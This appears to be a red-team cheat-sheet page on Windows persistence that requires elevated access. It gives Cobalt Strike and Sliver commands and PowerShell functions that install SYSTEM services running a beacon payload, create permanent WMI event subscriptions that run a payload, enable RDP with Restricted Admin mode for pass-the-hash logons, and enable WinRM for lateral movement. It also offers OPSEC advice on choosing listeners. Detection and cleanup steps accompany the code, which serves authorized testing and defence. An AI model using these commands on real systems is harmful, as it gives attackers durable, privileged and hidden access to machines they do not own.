Elevated Persistence
Persistence mechanisms that require elevated (high-integrity / SYSTEM) access. They are more durable than userland persistence: they survive user logoff and reboot, and the payload runs with higher privileges.
OPSEC: a SYSTEM process has no user proxy configuration or stored credentials, so an HTTP(S) beacon running as SYSTEM usually cannot egress through an authenticating web proxy. Use P2P (SMB/TCP) or DNS listeners for SYSTEM-level persistence, not HTTP.
These techniques must be performed from a high-integrity beacon.
See c. Artifact Removal for removal commands and post-engagement cleanup procedures.
Windows Services (SYSTEM)
Create a new service that runs a payload as SYSTEM on boot. Unlike hijacking an existing service for privilege escalation, this does not break legitimate services. The binary must be a real service executable (the Cobalt Strike .svc.exe artifact, which calls StartServiceCtrlDispatcher); a plain EXE is killed by the SCM with error 1053 when the start timeout expires.
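The same lifecycle with native cmdlets, reading back what the SCM actually recorded rather than trusting the create call. This is an added example, not code from the original page; it assumes Windows PowerShell 5.1 in a high-integrity context and a genuine service binary already on disk. The function names and the path C:\Windows\legit-svc.exe are illustrative.

```powershell
# Added example: create, verify and remove a SYSTEM service with native cmdlets.
# Assumes Windows PowerShell 5.1 run as an administrator. The binary must be a real
# service executable; a plain EXE makes the SCM report error 1053 after ~30 s.

function Install-SvcPersistence {
    param(
        [Parameter(Mandatory)][string]$Name,
        [Parameter(Mandatory)][string]$BinaryPath,
        [string]$DisplayName = $Name
    )
    if (-not (Test-Path -LiteralPath $BinaryPath)) {
        throw "Service binary not found: $BinaryPath"
    }
    # LocalSystem is the default account; Automatic = start at boot without a logon.
    # The path is quoted so a path with spaces cannot become an unquoted-service-path finding.
    New-Service -Name $Name -BinaryPathName "`"$BinaryPath`"" -DisplayName $DisplayName `
        -StartupType Automatic -ErrorAction Stop | Out-Null
    Start-Service -Name $Name -ErrorAction Stop   # throws on 1053 if the EXE is not a service

    # Read back what the SCM recorded, not what was requested.
    $svc = Get-CimInstance -ClassName Win32_Service -Filter "Name='$Name'"
    [pscustomobject]@{
        Name      = $svc.Name
        State     = $svc.State
        StartMode = $svc.StartMode
        RunsAs    = $svc.StartName
        Path      = $svc.PathName
        Ok        = ($svc.State -eq 'Running' -and $svc.StartMode -eq 'Auto' -and
                     $svc.StartName -eq 'LocalSystem')
    }
}

function Remove-SvcPersistence {
    param([Parameter(Mandatory)][string]$Name)
    $svc = Get-Service -Name $Name -ErrorAction SilentlyContinue
    if (-not $svc) { return $true }
    if ($svc.Status -ne 'Stopped') {
        Stop-Service -Name $Name -Force -ErrorAction SilentlyContinue
    }
    # Remove-Service only exists in PowerShell 6+; sc.exe works on every build.
    sc.exe delete $Name | Out-Null
    # Deletion is deferred until the last open handle closes; confirm it is really gone.
    return (-not (Get-Service -Name $Name -ErrorAction SilentlyContinue))
}

# Usage (hypothetical names):
# Install-SvcPersistence -Name 'legit-svc' -BinaryPath 'C:\Windows\legit-svc.exe'
# Remove-SvcPersistence  -Name 'legit-svc'
```

Install-SvcPersistence returns Ok = $true only when the service is running, set to Auto and owned by LocalSystem; anything else means the persistence will not come back on reboot as intended.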
Cobalt Strike
# 1. Upload svc binary and rename
beacon> cd C:\Windows
beacon> upload C:\Payloads\tcp-local_x64.svc.exe
beacon> mv tcp-local_x64.svc.exe legit-svc.exe
# 2. Create the service via SharPersist
beacon> execute-assembly SharPersist.exe -t service -c "C:\Windows\legit-svc.exe" -n "legit-svc" -m add
Manual
# Native sc create. sc.exe requires the space after each '='; obj= LocalSystem is the default and start= auto runs it at boot without a logon
sc create "legit-svc" binPath= "C:\Windows\legit-svc.exe" start= auto obj= "LocalSystem"
sc start legit-svc
# Remove (stop first; the SCM defers deletion until the last open handle to the service closes)
sc stop legit-svc
sc delete legit-svc
WMI Event Subscriptions
Permanent WMI event subscriptions live in the root\subscription namespace, survive reboots and run the payload as SYSTEM (spawned by WmiPrvSE.exe) when the trigger condition is met. Built from three WMI classes:
- EventConsumer — the action to perform (e.g. CommandLineEventConsumer runs a command line)
- EventFilter — the trigger, any WQL query (process start, logon, timer, etc.)
- FilterToConsumerBinding — links consumer and filter together; nothing fires until it exists
PowerLurk wraps the three objects in a single Register-MaliciousWmiEvent call.
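The three objects built by hand, plus the enumeration a defender (or you, checking your own footprint) would run and a cleanup that removes them in the right order. This is an added example, not code from the original page or from PowerLurk; it assumes Windows PowerShell 5.1 (the WMI cmdlets are gone in PowerShell 6+) in a high-integrity context. Function names, the WmiBackdoor name and the notepad.exe trigger are illustrative.

```powershell
# Added example: permanent WMI subscription without PowerLurk.
# Assumes Windows PowerShell 5.1 run as an administrator (root\subscription is admin-writable).

$Ns = 'root\subscription'

function Install-WmiPersistence {
    param(
        [Parameter(Mandatory)][string]$Name,
        [Parameter(Mandatory)][string]$Command,    # command line the consumer runs as SYSTEM
        [string]$ProcessName = 'notepad.exe'        # trigger: this process being created
    )
    # 1. __EventFilter: the WQL trigger. WITHIN 5 polls every 5 s; smaller = more WMI noise.
    $filter = Set-WmiInstance -Namespace $Ns -Class __EventFilter -Arguments @{
        Name           = $Name
        EventNamespace = 'root\cimv2'
        QueryLanguage  = 'WQL'
        Query          = "SELECT * FROM __InstanceCreationEvent WITHIN 5 WHERE " +
                         "TargetInstance ISA 'Win32_Process' AND TargetInstance.Name = '$ProcessName'"
    }
    # 2. CommandLineEventConsumer: the action. WmiPrvSE.exe spawns it as SYSTEM.
    $consumer = Set-WmiInstance -Namespace $Ns -Class CommandLineEventConsumer -Arguments @{
        Name                = $Name
        CommandLineTemplate = $Command
    }
    # 3. __FilterToConsumerBinding: the glue. Nothing fires until this exists.
    Set-WmiInstance -Namespace $Ns -Class __FilterToConsumerBinding -Arguments @{
        Filter   = $filter
        Consumer = $consumer
    } | Out-Null
}

function Get-WmiPersistence {
    # Windows ships one benign pair ('SCM Event Log Filter' / 'SCM Event Log Consumer');
    # anything else bound here deserves a look.
    $filters   = Get-WmiObject -Namespace $Ns -Class __EventFilter
    $consumers = Get-WmiObject -Namespace $Ns -Class __EventConsumer   # base class: every consumer type
    Get-WmiObject -Namespace $Ns -Class __FilterToConsumerBinding | ForEach-Object {
        # Filter/Consumer are reference strings such as __EventFilter.Name="WmiBackdoor"
        $fName = ($_.Filter   -split '"')[1]
        $cName = ($_.Consumer -split '"')[1]
        [pscustomobject]@{
            Name     = $fName
            Query    = ($filters   | Where-Object Name -eq $fName).Query
            Consumer = ($consumers | Where-Object Name -eq $cName).CommandLineTemplate
        }
    }
}

function Remove-WmiPersistence {
    param([Parameter(Mandatory)][string]$Name)
    # Binding first so no dangling reference is left behind, then filter and consumer.
    Get-WmiObject -Namespace $Ns -Class __FilterToConsumerBinding |
        Where-Object { ($_.Filter -split '"')[1] -eq $Name } | Remove-WmiObject
    Get-WmiObject -Namespace $Ns -Class __EventFilter -Filter "Name='$Name'" | Remove-WmiObject
    Get-WmiObject -Namespace $Ns -Class CommandLineEventConsumer -Filter "Name='$Name'" | Remove-WmiObject
}

# Usage (hypothetical names):
# Install-WmiPersistence -Name 'WmiBackdoor' -Command 'C:\Windows\dns_x64.exe'
# Get-WmiPersistence
# Remove-WmiPersistence -Name 'WmiBackdoor'
```

Get-WmiPersistence is exactly the view a hunt query over root\subscription gives, so run it after install to confirm the binding exists and after cleanup to confirm all three objects are gone; a leftover filter or consumer without a binding is still an indicator.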
Cobalt Strike
# 1. Upload payload
beacon> cd C:\Windows
beacon> upload C:\Payloads\dns_x64.exe
# 2. Import PowerLurk and create the event (fires when notepad.exe starts; the payload is spawned by WmiPrvSE.exe as SYSTEM)
beacon> powershell-import C:\Tools\PowerLurk.ps1
beacon> powershell Register-MaliciousWmiEvent -EventName WmiBackdoor -PermanentCommand "C:\Windows\dns_x64.exe" -Trigger ProcessStart -ProcessName notepad.exe
# Cleanup
beacon> powershell Get-WmiEvent -Name WmiBackdoor | Remove-WmiObject
Enable RDP
Enable Remote Desktop and open the firewall. Useful for interactive access and GUI-dependent tasks; note that each RDP logon is recorded as event 4624 with logon type 10 (RemoteInteractive).
Sliver
# Enable RDP
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
# 'netsh firewall' is deprecated; on current builds enable the built-in rule group instead
netsh firewall add portopening TCP 3389 "Remote Desktop"
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
# Enable Restricted Admin mode (DisableRestrictedAdmin = 0) so the RDP server accepts NT-hash (Pass-the-Hash) logons.
# The value is absent by default (mode disabled), so -Force creates it. Side effect: a Restricted Admin session has no reusable network credentials.
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0 -PropertyType DWORD -Force
Manual
# RDP with Pass-the-Hash (target must have Restricted Admin mode enabled, i.e. DisableRestrictedAdmin = 0)
xfreerdp /u:Administrator /pth:NTHASH /v:TARGET_IP /cert:ignore /dynamic-resolution
Enable WinRM
Enable PowerShell remoting for lateral movement via Enter-PSSession, Invoke-Command, etc.
Sliver
# Enable directly (add -SkipNetworkProfileCheck if the active network profile is Public, otherwise the call fails)
Enable-PSRemoting -Force
# Via SharpSh within Sliver
sharpsh -- -c '"Enable-PSRemoting -Force"'
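One function that enables both remote-access paths above (RDP, optionally with Restricted Admin mode so NT-hash logons work, and WinRM) and one that reads the resulting state back so you can confirm the change before disconnecting. This is an added example, not code from the original page, Sliver or SharpSh; it assumes Windows PowerShell 5.1 on Windows 8.1 / Server 2012 R2 or later (NetSecurity module present) run in a high-integrity context. Function names are illustrative.

```powershell
# Added example: enable RDP (+ Restricted Admin) and WinRM, then verify.
# Assumes Windows PowerShell 5.1, administrator, Windows 8.1 / 2012 R2 or later.

function Enable-RemoteAccess {
    param([switch]$RestrictedAdmin)

    # --- RDP ---
    $ts = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    Set-ItemProperty -Path $ts -Name fDenyTSConnections -Value 0 -Type DWord
    # Built-in rule group covers TCP and UDP 3389; replaces the deprecated 'netsh firewall'.
    Enable-NetFirewallRule -DisplayGroup 'Remote Desktop'

    if ($RestrictedAdmin) {
        # DisableRestrictedAdmin = 0 ENABLES Restricted Admin mode, which is what lets
        # xfreerdp /pth authenticate with an NT hash. Side effect: the session has no
        # reusable network credentials (network access runs as the machine account).
        # The value does not exist by default, so -Force creates it.
        New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' `
            -Name DisableRestrictedAdmin -Value 0 -PropertyType DWord -Force | Out-Null
    }

    # --- WinRM ---
    # -SkipNetworkProfileCheck avoids the failure on hosts whose active profile is Public.
    Enable-PSRemoting -Force -SkipNetworkProfileCheck | Out-Null
}

function Get-RemoteAccessState {
    $ts  = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    $lsa = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    [pscustomobject]@{
        RdpEnabled          = ($ts.fDenyTSConnections -eq 0)
        RdpFirewallOpen     = [bool](Get-NetFirewallRule -DisplayGroup 'Remote Desktop' |
                                  Where-Object { $_.Enabled -eq 'True' -and $_.Direction -eq 'Inbound' })
        # Absent value => $null -eq 0 is $false => Restricted Admin mode is off.
        RestrictedAdminMode = ($lsa.DisableRestrictedAdmin -eq 0)
        WinRmService        = (Get-Service WinRM).Status
        WinRmListening      = [bool](Get-ChildItem WSMan:\localhost\Listener -ErrorAction SilentlyContinue)
    }
}

# Usage (hypothetical):
# Enable-RemoteAccess -RestrictedAdmin
# Get-RemoteAccessState
```

Run Get-RemoteAccessState before and after; RestrictedAdminMode must read $true before an xfreerdp /pth logon will succeed, and WinRmListening $true before Enter-PSSession or Invoke-Command will connect.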